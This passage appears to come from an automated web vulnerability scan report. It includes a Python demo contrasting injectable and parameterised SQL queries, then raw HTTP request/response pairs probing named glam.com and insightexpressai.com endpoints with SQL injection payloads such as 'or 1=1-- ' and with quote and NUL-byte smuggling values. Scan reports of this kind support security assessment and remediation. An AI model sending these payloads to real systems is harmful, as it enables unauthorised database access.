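    return "'" not in visible


def application_value(raw):
    """Assumed application behaviour: the NUL is dropped and the rest kept, so
    the quote the filter never saw reaches the query."""
    return raw.replace("\x00", "")


def run_demo():
    conn = make_db()
    cookie = unquote("F%00'")  # the userAB value from 1.7, URL-decoded
    return {
        "quote_single": quote_probe(conn, "Home'"),
        "quote_double": quote_probe(conn, "Home''"),
        "diff_vulnerable": differential_probe(conn, vulnerable_lookup, "168855159"),
        "diff_safe": differential_probe(conn, safe_lookup, "168855159"),
        "rows_true": vulnerable_lookup(conn, "168855159 or 1=1-- "),
        "rows_false": vulnerable_lookup(conn, "168855159 or 1=2-- "),
        "filter_blocks_quote": not native_filter_allows("F'"),
        "filter_passes_nul": native_filter_allows(cookie),
        "app_receives": application_value(cookie),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:20} {result!r}")
```

Run it directly to print each result. The point the report leaves implicit is in the diff_safe result: with the parameter bound, both payloads produce the same (empty) row set, which is why a parameterised query is the remediation rather than a block list. The filter_passes_nul and app_receives results show why a filter that stops at the first NUL byte is not a substitute: it approves the value while the application still receives the quote.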

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=168855159%20or%201%3d1--%20 HTTP/1.1
Host: celebrities.glam.com
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Wed, 20 Apr 2011 18:35:41 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app136
Content-Length: 20918
X-Varnish: 1132209529
Expires: Thu, 21 Apr 2011 01:35:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:35:44 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a 
href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onm
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=168855159%20or%201%3d2--%20 HTTP/1.1
Host: celebrities.glam.com
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Thu, 21 Apr 2011 01:35:46 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 2293
X-Varnish: 303279105
Expires: Thu, 21 Apr 2011 01:35:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:35:46 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://news.glam.com/' title='News'>News</a></li><li class=''><a href='http://style.glam.com/' title='Style'>Style</a></li><li class=''><a href='http://alist.glam.com/' title='A-List'>A-List</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a> <a href='http://celebr
...[SNIP]...

1.10. http://core.insightexpressai.com/adServer/GetInvite2.aspx [adexpansion parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The adexpansion parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the adexpansion parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0'&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:57:19 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0''&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19840
Date: Thu, 21 Apr 2011 01:57:19 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.11. http://core.insightexpressai.com/adServer/GetInvite2.aspx [click parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The click parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the click parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0'&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:57:29 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0''&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19840
Date: Thu, 21 Apr 2011 01:57:30 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.12. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The creativeID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the creativeID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968' HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:57:33 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968'' HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19840
Date: Thu, 21 Apr 2011 01:57:33 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.13. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The esi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true'&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:57:10 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true''&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19840
Date: Thu, 21 Apr 2011 01:57:10 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.14. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968&1'=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:57:38 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968&1''=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19856
Date: Thu, 21 Apr 2011 01:57:38 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.15. http://core.insightexpressai.com/adServer/GetInvite2.aspx [placementID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The placementID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the placementID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525'&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:57:26 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com&adexpansion=0&siteID=glamcom&placementID=1248525''&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 19840
Date: Thu, 21 Apr 2011 01:57:26 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...

1.16. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The referer parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the referer parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note also that Response 2 here is 19842 bytes, two bytes longer than the 19840-byte script returned for the doubled-quote requests against esi, placementID and siteID; the two extra bytes match the two extra quote characters in referer=fashion.glam.com'', which is consistent with the referer value being echoed into the returned JavaScript. Given this report's focus on reflected script injection, that parameter also merits a check of how its value is encoded on output.

Request 1

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=fashion.glam.com'&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 3034
Vary: Accept-Encoding
Date: Thu, 21 Apr 2011 01:57:15 GMT
Connection: close
Cache-Control: no-store

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
